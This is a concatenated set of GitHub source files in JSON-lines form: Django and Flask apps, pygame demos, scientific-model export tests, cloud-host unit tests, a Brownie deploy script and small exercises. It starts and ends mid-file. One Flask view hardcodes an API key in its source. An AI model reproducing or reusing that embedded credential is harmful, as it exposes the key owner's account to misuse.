self.warning(\"ServerFactory.restore_artifacts - item '%s' has no artifacts\", item.id, item=item)\n return\n if not artifacts_path:\n artifacts_path = self.get_artifacts_directory()\n for asset in assets:\n cache_path = self.get_cache_asset(item, \"data\", asset[\"id\"])\n artifact_path = os.path.join(artifacts_path, asset[\"id\"])\n if symlink:\n # when running locally we can symlink files and save time\n os.symlink(cache_path, artifact_path)\n else:\n # when building docker images we need to really copy the files\n shutil.copyfile(cache_path, artifact_path)\n\n ##\n ## Log methods\n ##\n\n def 
_prepare_log(self, msg, *args, **kwargs):\n \"\"\" Add contextual items to the log record \"\"\"\n msg, args, kwargs = super()._prepare_log(msg, *args, **kwargs)\n for item_name in (\"endpoint\", \"token\", \"job\", \"request\"):\n item = self.get_attribute(item_name, None)\n if item:\n kwargs[\"extra\"][item_name] = item\n return msg, args, kwargs\n\n ##\n ## Factory methods\n ##\n\n def get_item(self, item_id):\n \"\"\" Loads a model from database given its id whose prefix determines the model type, eg: ws_xxx for Workspace. \"\"\"\n # TODO limit access to objects available with request credentials\n assert isinstance(item_id, str), \"Factory.get_item - item_id should be a string with a valid item identifier\"\n try:\n if item_id.startswith(analitico.DATASET_PREFIX):\n return api.models.Dataset.objects.get(pk=item_id)\n if item_id.startswith(analitico.ENDPOINT_PREFIX):\n return api.models.Endpoint.objects.get(pk=item_id)\n if item_id.startswith(analitico.JOB_PREFIX):\n return api.models.Job.objects.get(pk=item_id)\n if item_id.startswith(analitico.MODEL_PREFIX):\n return api.models.Model.objects.get(pk=item_id)\n if item_id.startswith(analitico.NOTEBOOK_PREFIX):\n return api.models.Notebook.objects.get(pk=item_id)\n if item_id.startswith(analitico.RECIPE_PREFIX):\n return api.models.Recipe.objects.get(pk=item_id)\n if item_id.startswith(analitico.WORKSPACE_PREFIX):\n return api.models.Workspace.objects.get(pk=item_id)\n if item_id.startswith(analitico.AUTOML_PREFIX):\n return api.models.Automl.objects.get(pk=item_id)\n except Exception as exc:\n self.warning(\"get_item: could not find item %s\", item_id)\n raise exc\n try:\n validate_email(item_id)\n return api.models.User.objects.get(email=item_id)\n except validate_email.ValidationError:\n pass\n self.warning(\"get_item: could not find item type for %s\", item_id)\n raise NotFound(\"ServerFactory.get_item - could not find given item type \" + item_id)\n\n ##\n ## with Factory as: lifecycle methods\n ##\n\n def __exit__(self, exception_type, exception_value, traceback):\n \"\"\" Delete any temporary files upon exiting \"\"\"\n if self._temp_directory:\n shutil.rmtree(self._temp_directory, ignore_errors=True)\n\n\n# shared instance of server side factory\nfactory = ServerFactory()\n","repo_name":"analitico/analitico","sub_path":"source/api/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":9243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18251624484","text":"from flask import render_template\nfrom app import app\nfrom urllib import request, parse\nimport json\n\n\n@app.route('/')\ndef index():\n title = \"Flask -- Working with Apis and json data\"\n\n requestVariables = {\n \"api_key\": '22f3e85e05becdb7e502c1f391dbd90d',\n 'limit': '10'\n }\n\n encodeVars = parse.urlencode(requestVariables)\n API_BASE_URL = 'https://api.themoviedb.org/3/movie/popular?'\n req_open = request.urlopen(API_BASE_URL + encodeVars)\n req_read = req_open.read()\n req_json = json.loads(req_read)\n movies = req_json['results']\n # img = 'https://image.tmdb.org/t/p/w500/'+ poster_path\n\n return render_template('index.html', title=title, movies=movies)\n","repo_name":"otienosteve/python_api_call-no-frameworks-used","sub_path":"John-Njau/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20121357402","text":"#!/usr/bin/python3\n\nimport 
pygame\nfrom yogini import Yogini\nimport sequences\n\nsuccesses, failures = pygame.init()\n\nscreen = pygame.display.set_mode((1280, 720))\n# screen = pygame.display.set_mode((0, 0), pygame.RESIZABLE)\nclock = pygame.time.Clock()\nFPS = 60\n\n# create the yogini\nyogini = Yogini()\nssize = pygame.display.get_surface().get_size()\nyogini.body.pos = [ssize[0] / 2, ssize[1] / 2]\nyogini.sequence = sequences.ashtanga\n\ntime = 0\n\nrunning = True\nwhile running:\n # Returns milliseconds between each call to 'tick'. The convert time to seconds.\n dt = clock.tick(FPS) / 1000\n time += dt\n screen.fill((255, 218, 148)) # Fill the screen with background color.\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.VIDEORESIZE:\n yogini.body.pos = [event.w / 2, event.h / 2]\n\n # let the yogini live\n yogini.live(time)\n\n # ...and draw it\n yogini.draw(screen)\n\n pygame.display.update()\n\nprint(\"Exited the game loop. Game will quit...\")\n","repo_name":"simon123h/pyogini","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29305517641","text":"\"\"\"djangomom URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^projects/', include('project.urls',\n namespace='projects')),\n url(r'^apps/', include('app.urls',\n namespace='apps')),\n url(r'^models/', include('modeller.urls',\n namespace='models')),\n url(r'^account/', include('account.urls',\n namespace='account')),\n url(r'^', include('core.urls',\n namespace='core')),\n url(r'^endpoint/', include('endpoint.urls',\n namespace='endpoint')),\n url(r'^serializer/', include('serializer.urls',\n namespace='serializer')),\n]\n","repo_name":"emiamar/djangomom","sub_path":"djangomom/djangomom/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38522014574","text":"import cv2\nimport os\n\n\ndef remove_blurry_images(src_folder):\n img_names_list = os.listdir(src_folder)\n\n for img in img_names_list:\n if img.endswith('.jpeg'):\n img2 = cv2.imread(src_folder+img, cv2.IMREAD_GRAYSCALE)\n laplacian_var = cv2.Laplacian(img2, cv2.CV_64F).var()\n if laplacian_var < 10:\n print(img + \" :Image blurry\")\n os.remove(src_folder+img)\n\nremove_blurry_images(src_folder = '../processed_299_299/')","repo_name":"rishabkatta/Diabetic-Retinopathy-Detection","sub_path":"preprocessing_scripts/remove_blurry_images.py","file_name":"remove_blurry_images.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6183891636","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\nimport fiona\nimport rasterio\nfrom shapely.geometry import box\nimport pytest\nfrom gisutils import shp2df\nfrom mfexport.list_export import mftransientlist_to_dataframe\nfrom mfexport.inputs import export, summarize\nfrom .test_results_export import check_files, compare_polygons\n\n\ndef test_model_export(model):\n m, grid, output_path = model\n outfiles = export(m, grid, output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_packages_export(model):\n m, grid, output_path = model\n packages = ['dis'] # 'wel'\n outfiles = export(m, grid, packages[0], output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_package_export(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['thickness', 'top', 'botm']\n layers = list(range(get_nlay(m)))\n if m.version == 'mf6':\n variables.append('idomain')\n outfiles = export(m, grid, package='dis', output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef get_nlay(model):\n if model.version == 'mf6':\n nlay = model.dis.nlay.array\n else:\n nlay = model.dis.nlay\n return nlay\n\n\ndef get_nrow_ncol_nlay_nper(model):\n if model.version == 'mf6':\n nlay = model.dis.nlay.array\n nrow = model.dis.nrow.array\n ncol = model.dis.ncol.array\n nper = model.nper\n else:\n nrow, ncol, nlay, nper = model.nrow_ncol_nlay_nper\n return nrow, ncol, nlay, nper\n\n\ndef test_variables_export(model):\n m, grid, output_path = model\n variables = ['top', 'thickness']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid,\n variables=variables,\n output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_variable_export(model):\n # if 'package' 
is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['botm']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable='botm', output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_transient2d_bar_graph(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['recharge']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable=variables, output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_export_irch(shellmound):\n m, grid, output_path = shellmound\n variables = ['irch']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable='irch', output_path=output_path)\n n_unique_pers = len(set(m.rch.irch.array.sum(axis=(1, 2, 3))))\n # should be a pdf and tif for each unique period\n assert len(outfiles) == n_unique_pers * 2\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_variable_export_with_package(model):\n m, grid, output_path = model\n variables = ['botm']\n packages = ['dis']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid,\n packages=packages,\n variables=variables,\n output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_summary(model):\n m, grid, output_path = model\n df = summarize(m, output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_package_list_export(model):\n m, grid, output_path = model\n packages = ['dis', 'rch'] #, 'wel']\n variables = ['botm', 'top', 'thickness', 'idomain', 'rech', 'recharge'] #, 'wel']\n if m.version == 'mf6':\n variables.append('irch')\n nrow, ncol, nlay, nper = get_nrow_ncol_nlay_nper(m)\n layers = list(range(nlay))\n outfiles = []\n for package in packages:\n outfiles += export(m, grid, package, output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n tifs = [f for f in outfiles if f.endswith('.tif')]\n for f in tifs:\n with rasterio.open(f) as src:\n assert src.width == ncol\n assert src.height == nrow\n compare_polygons(grid.bbox, box(*src.bounds))\n shps = [f for f in outfiles if f.endswith('.shp')]\n for f in shps:\n with fiona.open(f) as src:\n assert box(*src.bounds).within(grid.bbox)\n\n\ndef test_transient_list_export(model):\n m, grid, output_path = model\n outfiles = export(m, grid, 'wel', output_path=output_path)\n variables = ['wel0_stress_period_data']\n if m.version != 'mf6':\n variables = ['wel_stress_period_data']\n check_files(outfiles, variables=variables)\n df = mftransientlist_to_dataframe(m.wel.stress_period_data, squeeze=True)\n df.index = range(len(df))\n if 'cellid' in df.columns:\n df['cellid'] = df['cellid'].astype(str)\n df2 = shp2df(outfiles[0]).drop('geometry', axis=1)\n numeric_cols = [c for c in df.columns if is_numeric_dtype(df[c].dtype)]\n assert np.allclose(df[numeric_cols], df2[numeric_cols])\n\n\ndef test_export_sfr(model):\n m, grid, output_path = model\n # mf2005 style SFR export not implemented yet\n # TODO: implement mf2005 sfr package export\n if m.version != 'mf6':\n return\n outfiles = export(m, grid, 'sfr', output_path=output_path)\n # TODO: finish this test\n variables = ['shellmound.sfr']\n if m.version != 'mf6':\n variables = ['wel_stress_period_data']\n df = pd.DataFrame(m.sfr.reach_data.array)\n compare_cols = ['strtop']\n else:\n df = pd.DataFrame(m.sfr.packagedata.array)\n compare_cols = ['rlen', 'rwid', 'rgrd', 'rtp', 'rbth', 'rhk']\n check_files(outfiles, variables=variables)\n df.index = range(len(df))\n 
if 'cellid' in df.columns:\n df['cellid'] = df['cellid'].astype(str)\n df2 = shp2df(outfiles[0]).drop('geometry', axis=1)\n df2['cellid'] = list(zip(df2['k'], df2['i'], df2['j']))\n df2['cellid'] = df2['cellid'].astype(str)\n assert np.allclose(df[compare_cols], df2[compare_cols])","repo_name":"aleaf/modflow-export","sub_path":"mfexport/tests/test_model_export.py","file_name":"test_model_export.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"40620596491","text":"n = int(input())\na = list(map(int, input().split()))\nma, mi = a[0], a[0]\nans1, ans2 = 0, 0\nfor v in a:\n if v > ma:\n ans1 += 1\n ma = v\n if v < mi:\n ans2 += 1\n mi = v\nprint(ans1, ans2)","repo_name":"wiwitrifai/competitive-programming","sub_path":"hackerrank/university-codesprint-2/breaking.py","file_name":"breaking.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"86737707380","text":"print(\"\\n\\t\\tA partir dos valores da aceleração (a em m/s2), da velocidade inicial (v0 em m/s)\" +\n \"\\n\\t\\te do tempo de percurso (t em s). Calcular e exibir a velocidade final de automóvel em km/h.\")\n\naceleracao = float(input(\"\\n\\n\\t\\tDigite a aceleração do veiculo (em metros por segundo): \"))\nvelocidadeinicial = float(input(\"\\n\\t\\tDigite a velocidade inicial do veiculo (em km por hora): \"))\ntempo = float(input(\"\\n\\t\\tDigite o tempo do percurso do veiculo (em segundos): \"))\n\n# V = v0 + a. t\n\nsegundoconvertido = tempo * 60\naceleracaoconvertida = aceleracao / 3.6\nvelocidadefinal = velocidadeinicial+ (aceleracaoconvertida*segundoconvertido)\n\nif velocidadefinal <= 40:\n print(\"\\n\\t\\tVeiculo muito LENTO.\")\nelif (velocidadefinal > 40) & (velocidadefinal <= 60):\n print(\"\\n\\t\\tVeiculo em velocidade PERMITIDA.\")\nelif (velocidadefinal > 60) & (velocidadefinal <= 80):\n print(\"\\n\\t\\tVeiculo RAPIDO.\")\nelif velocidadefinal > 120:\n print(\"\\n\\t\\tVeiculo MUITO RAPIDO.\")\n","repo_name":"M4NS0/homeworks","sub_path":"Python/Lógica de Programação I/Exercícios/Lista4/exercicio06.py","file_name":"exercicio06.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34414828365","text":"import pygame\nimport os,sys\npygame.init()\n\nSCREENHEIGHT = 480\nSCREENWIDTH = 640\nscreen = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))\npygame.display.set_caption(\"Testing text\")\nbackground = pygame.Surface(screen.get_size())\nbackground = background.convert()\nFonz = pygame.font.Font(None,40)\ncount = 0\ndone = False\nclock = pygame.time.Clock()\nwhile not done:\n clock.tick(30)\n background.fill((255,255,255))\n \n screen.blit(background,(0,0))\n count += 1\n screen.blit(Fonz.render(\"Hello\",True,(0,0,0),(150,255,255)),(count,20))\n pygame.display.flip()\n\npygame.quit()","repo_name":"montepy/PyBullet","sub_path":"TextTesting/TextTesting/TextTesting.py","file_name":"TextTesting.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72604958889","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.io import ascii\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\nplt.rcParams['xtick.major.size'] = 
9\nplt.rcParams['xtick.major.width'] = 2\nplt.rcParams['xtick.minor.size'] = 6\nplt.rcParams['xtick.minor.width'] = 1\nplt.rcParams['ytick.major.size'] = 9\nplt.rcParams['ytick.major.width'] = 2\nplt.rcParams['ytick.minor.size'] = 6\nplt.rcParams['ytick.minor.width'] = 1\nplt.rcParams['axes.linewidth'] = 2\nplt.rcParams['font.size']=15\nplt.rcParams['mathtext.default']='regular'\nplt.rcParams['lines.markersize']=8\nplt.rcParams['xtick.major.pad']='3'\nplt.rcParams['ytick.major.pad']='3'\nplt.rcParams['ytick.minor.visible'] = 'True'\nplt.rcParams['xtick.minor.visible'] = 'True'\nplt.rcParams['xtick.direction'] = 'inout'\nplt.rcParams['ytick.direction'] = 'inout'\nplt.rcParams['ytick.right'] = 'True'\nplt.rcParams['xtick.top'] = 'True'\n\n# use a color-blind friendly palette\n# orange, red, light blue, dark blue\ncolors=['#FF9408','#DC4D01','#00A9E0','#016795']\n\n#dat=ascii.read('sample/scatter10.csv')\ndat=ascii.read('data/scatter-all.csv')\n#dat=ascii.read('data/scatter-all-fullsecs.csv')\n\nix,un=np.unique(dat['ticids'],return_index=True)\ndat=dat[un]\n\num=np.where(dat['teff'] < 8000.)[0]\nprint(len(um),'unique stars with Teff < 8000K')\n\nplt.ion()\nplt.clf()\n\nfig = plt.figure(figsize=(6, 8))\n\nupl=16\n\nplt.clf()\ngs = gridspec.GridSpec(2, 1)\n\nax0 = plt.subplot(gs[0, 0])\nplt.scatter(dat['teff'],dat['rad'],c=dat['tmags'],marker='o',alpha=1., vmax=upl, cmap='cubehelix',s=12, rasterized=True)\n#plt.legend(loc='best')\n#plt.plot([8000,4000],[5,3.4],ls='dashed',color='royalblue')\nplt.xlim([8000,2700])\nplt.ylim([0.1,200])\nplt.xlabel('Effective Temperature (K)')\nplt.ylabel('Stellar Radius (Solar)')\nplt.yscale('log')\nplt.annotate(\"(a)\", xy=(0.05, 0.1), xycoords=\"axes fraction\",fontsize=24,color='black')\ncbaxes = inset_axes(ax0, width=\"40%\", height=\"5%\", loc=2) \nplt.colorbar(cax=cbaxes, orientation='horizontal', label='Tmag')\n\nax1 = plt.subplot(gs[1, 0])\num=np.where(dat['teff'] < 8000.)[0]\nplt.semilogy(dat['tmags'][um],dat['rad'][um],'.',color=colors[3], rasterized=True)\nplt.xlabel('TESS Magnitude')\nplt.ylabel('Stellar Radius (Solar)')\nplt.xlim([2,16])\nplt.annotate(\"(b)\", xy=(0.05, 0.82), xycoords=\"axes fraction\",fontsize=24,color='black')\n\nplt.subplots_adjust(wspace=0.20,hspace=0.26,left=0.155,right=0.97,bottom=0.08,top=0.98)\n\n#plt.savefig('fig1.png',dpi=150)\n\n\n#plt.savefig('fig-hrd-all-v2.png',dpi=150)\n\n","repo_name":"danxhuber/tess20sec","sub_path":"sample/fig1.py","file_name":"fig1.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24031845312","text":"from unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nfrom click.testing import CliRunner\n\nimport empty_host\nfrom cosmicops.objects.host import CosmicHost, RebootAction\n\n\nclass TestEmptyHost(TestCase):\n def setUp(self):\n co_patcher = patch('cosmicops.empty_host.CosmicOps')\n self.co = co_patcher.start()\n self.addCleanup(co_patcher.stop)\n self.co_instance = self.co.return_value\n\n slack_patcher = patch('cosmicops.log.Slack')\n self.mock_slack = slack_patcher.start()\n self.addCleanup(slack_patcher.stop)\n\n self.runner = CliRunner()\n self.host = CosmicHost(Mock(), {\n 'id': 'h1',\n 'name': 'host1',\n 'resourcestate': 'Enabled'\n })\n self.host.disable = Mock(return_value=True)\n self.host.empty = Mock(return_value=(1, 1, 0))\n self.host.reboot = Mock(return_value=True)\n self.host.set_uid_led = Mock()\n self.co_instance.get_host.return_value = self.host\n\n def 
test_main(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.co.assert_called_with(profile='config', dry_run=False, log_to_slack=True)\n self.co_instance.get_host.assert_called_with(name='host1')\n self.host.disable.assert_called()\n self.host.empty.assert_called()\n self.host.reboot.assert_not_called()\n self.host.set_uid_led.assert_not_called()\n\n def test_skip_disable(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--skip-disable', 'host1']).exit_code)\n self.host.disable.assert_not_called()\n self.host.empty.assert_called()\n\n def test_disable_failure(self):\n self.host.disable.return_value = False\n\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.host.disable.assert_called()\n\n def test_fail_on_empty_host_response(self):\n self.co_instance.get_host.return_value = []\n\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.co_instance.get_host.assert_called_with(name='host1')\n\n def test_shutdown(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_called_with(RebootAction.HALT)\n self.host.set_uid_led.assert_called_with(True)\n\n def test_shutdown_with_failed_hosts(self):\n self.host.empty.return_value = (2, 1, 1)\n\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_not_called()\n self.host.set_uid_led.assert_not_called()\n\n def test_shutdown_failure(self):\n self.host.reboot.return_value = False\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_called_with(RebootAction.HALT)\n\n def test_dry_run(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['host1']).exit_code)\n self.co.assert_called_with(profile='config', dry_run=True, log_to_slack=False)\n","repo_name":"MissionCriticalCloud/cosmicOps","sub_path":"tests/test_empty_host.py","file_name":"test_empty_host.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71823428328","text":"from scripts.helpful_scripts import get_account\nfrom brownie import SimpleStorage\n\n\nimport os\nimport json\nimport yaml\nimport shutil\n\n\ndef deploy_simple_storage(update_front_end=False):\n account = get_account()\n simple_storage = SimpleStorage.deploy({\"from\": account})\n print(f\"Contract deployed at: {simple_storage.address}\")\n\n if update_front_end:\n update_frontend()\n\n\ndef update_frontend():\n # Send the build folder to front-end\n copy_folders_to_front_end(\"./build\", \"./front-end/pages/chain-info\")\n # Send Brownie-config.yaml\n with open(\"brownie-config.yaml\", \"r\") as brownie_config:\n config_dict = yaml.load(brownie_config, Loader=yaml.FullLoader)\n with open(\"./front-end/pages/brownie-config.json\", \"w\") as brownie_config_json:\n json.dump(config_dict, brownie_config_json)\n\n\ndef copy_folders_to_front_end(src, dest):\n if os.path.exists(dest):\n shutil.rmtree(dest)\n shutil.copytree(src, dest)\n\n\ndef main():\n 
deploy_simple_storage(update_front_end=True)\n","repo_name":"cromewar/Full-Stack-Simple-Storage-Brownie","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28215438224","text":"def computer(a,b,c):\n\tif c == 1:\n\t\tk = a+b\n\t\t#print(\"和:%0.2f\"%k)\n\telif c == 2:\n\t\tk = a-b\n\t\tprint(\"差:%.02f\"%k)\n\telif c == 3:\n\t\tk = a*b\n\t\t#print(\"积:%.02f\"%k)\n\telif c == 4:\n\t\tif b != 0:\n\t\t\tk = a/b\n\t\t\t#print(\"商:%.02f\"%k)\n\t\telse:\n\t\t\t#print(\"输入格式不对\")\n\t\t\tc = \"输入格式不对\"\n\t\t\treturn c\n\treturn k\na = float(input(\"输入一个数\"))\nb = float(input(\"再输入一个数\"))\nc = int(input(\"输入运算符号: 1.和 2.差 3.乘 4.商\"))\nnumber = computer(a,b,c)\nprint(number)\n","repo_name":"superwenqistyle/1803","sub_path":"15day/计算器.py","file_name":"计算器.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41478736036","text":"### In this HashMap Implementation I am handing collision through chaining method ###\nclass HashMap:\n def __init__(self):\n self.max = 10\n self.arr = [[] for i in range(self.max)]\n \n#################### Hash Function ####################\n def get_hash(self, key):\n h = 0\n for char in key:\n h += ord(char) # ord gives us Ascii value of character \n return h % self.max\n\n################# Function to Add Item in HashMap ###################### \n def __setitem__(self,key, val):\n h = self.get_hash(key)\n found = False\n for idx, element in enumerate(self.arr[h]):\n if len(element) == 2 and element[0] == key:\n self.arr[h][idx] = (key,val) \n found = True\n break\n if not found:\n self.arr[h].append((key,val)) \n\n################# Function to Retrieve/Get Item from HashMap ###################### \n def __getitem__(self, key):\n h = self.get_hash(key)\n for element in self.arr[h]:\n if element[0] == key:\n return element[1]\n\n################# Function to Delete Item from HashMap ###################### \n def __delitem__(self, key):\n h = self.get_hash(key)\n for idx,element in enumerate(self.arr[h]):\n if element[0] == key:\n del self.arr[h][idx]\n\n\nh = HashMap()\n\nh[\"march 5\"] = 10 # Adding key,val pair\nh[\"march 6\"] = 12\nh[\"march 17\"] = 14\n\nprint(h[\"march 6\"])\nprint(h[\"march 17\"])\n\ndel h[\"march 17\"] # Deleting\n\nprint(h[\"march 17\"]) # Print after deleting\n\n\n\n","repo_name":"Najaf-Zawar/Data-Structures-Algorithms-DSA-in-Python","sub_path":"#5_HasMap(Chaining).py","file_name":"#5_HasMap(Chaining).py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20383110543","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass Institute(models.Model):\n name = models.CharField(\"Название института\",\n max_length=400, unique=True)\n description = models.TextField(\"Информация об институте\",\n default=\"None\", blank=True)\n employees_count = models.IntegerField(\"Число сотрудников\",\n default=1)\n scientist_count = models.IntegerField(\"Число молодых учёных\",\n default=0)\n chairman = models.CharField(\"Ф.И.О. 
председателя СМУ\",\n max_length=200)\n link = models.URLField(\"Ссылка на сайт института\")\n smu_link = models.URLField(\"Ссылка на сайт СМУ института\",\n null=True, blank=True)\n \n def __str__(self):\n return (f\"Institute(id={self.id}, name=\\\"{self.name}\\\", \"\n f\"info=\\\"{self.description[:50]}...\\\", \"\n f\"link=\\\"{self.link}\\\")\")\n\n\nclass Scientist(models.Model):\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n queue = models.OneToOneField(\"moderators.Queue\",\n on_delete=models.SET_NULL, null=True)\n institute = models.ForeignKey(Institute, on_delete=models.CASCADE,\n null=True)\n name = models.CharField(\"Имя учёного\", max_length=200)\n lab = models.CharField(\"Лаборатория\", max_length=300)\n position = models.CharField(\"Должность\", max_length=300)\n degree = models.CharField(\"Учёная степень\", max_length=200,\n null=True)\n scientific_interests = models.TextField(\"Сфера научных интересов\")\n \n def __str__(self):\n return (f\"ScientistInfo(id={self.id}, \"\n f\"institute=\\\"{self.institute.name}\\\", \"\n f\"name=\\\"{self.name}\\\", position=\\\"{self.position}\\\", \"\n \"scientific_interests=\"\n f\"\\\"{self.scientific_interests}\\\")\")\n\n\nclass ScientistLink(models.Model):\n scientist = models.ForeignKey(Scientist,\n on_delete=models.CASCADE)\n link = models.URLField(\"Ссылка на профиль\")\n service_name = models.CharField(\"Краткое описание\", max_length=250)\n\n\nclass Grant(models.Model):\n queue = models.OneToOneField(\"moderators.Queue\",\n on_delete=models.SET_NULL, null=True)\n name = models.CharField(\"Название гранта\", max_length=300)\n description = models.TextField(\"Описание гранта\", null=True)\n end_doc_date = models.DateTimeField(\"Дата окончания приёма заявок\",\n null=True)\n end_result_date = models.DateTimeField(\"Дата подведения итогов\",\n null=True)\n criteria = models.TextField(\"Критерии к участникам\", null=True)\n link = models.URLField(\"Ссылка на страницу с грантом\")\n \n def __str__(self):\n return (f\"Grant(id={self.id}, name=\\\"{self.name}\\\", \"\n f\"end_doc_date=\\\"{self.end_doc_date}\\\", \"\n f\"end_result_date=\\\"{self.end_result_date}\\\")\")\n","repo_name":"Jrol123/SYSC_site","sub_path":"smu_site/apps/info/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21122658731","text":"import constant\nfrom card import HeroClass\nimport logging\nimport multiprocessing\nfrom match_multiprocess import Match\nfrom player.random_player import RandomPlayer\nimport time\nimport numpy\n\n\ndef test_rd_vs_rd_all_fireblast_deck(arg):\n \"\"\" test random vs. 
random \"\"\"\n match, idx = arg\n return match.play_one_match(idx).name\n\nif __name__ == \"__main__\":\n match_num = 6000\n\n start_health = 30\n deck = constant.mage_fix_deck\n logger = logging.getLogger('hearthstone')\n logger.addHandler(logging.StreamHandler())\n logger.setLevel(logging.WARNING)\n player1 = RandomPlayer(cls=HeroClass.MAGE, name='player1', first_player=True,\n start_health=start_health, fix_deck=deck)\n player2 = RandomPlayer(cls=HeroClass.MAGE, name='player2', first_player=False,\n start_health=start_health, fix_deck=deck)\n # test\n # logger.setLevel(logging.INFO)\n player1.reset(test=True)\n player2.reset(test=True)\n match = Match(player1, player2)\n\n start_time = time.time()\n win_results = []\n p = multiprocessing.Pool()\n for res in p.imap_unordered(test_rd_vs_rd_all_fireblast_deck, [(match, i) for i in range(match_num)]):\n win_results.append(res)\n duration = time.time() - start_time\n\n # print(\"win result:\", win_results)\n print(\"player1 win result:\", numpy.mean(numpy.array(win_results) == \"player1\"))\n print(\"duration:\", duration)","repo_name":"czxttkl/X-AI","sub_path":"useless/AI/play_game_multiprocess.py","file_name":"play_game_multiprocess.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"31099661600","text":"# -*- coding: utf-8 -*-\n\n# The diameter of a tree is the largest path\n# from a leaf to another leaf.\n# i.e: the largest path from one node\n# to another.\n# The common ancestor may not be the root\n\n\nclass Vertex:\n def __init__(self, label, left=None, right=None):\n self.label = label\n self.left = left\n self.right = 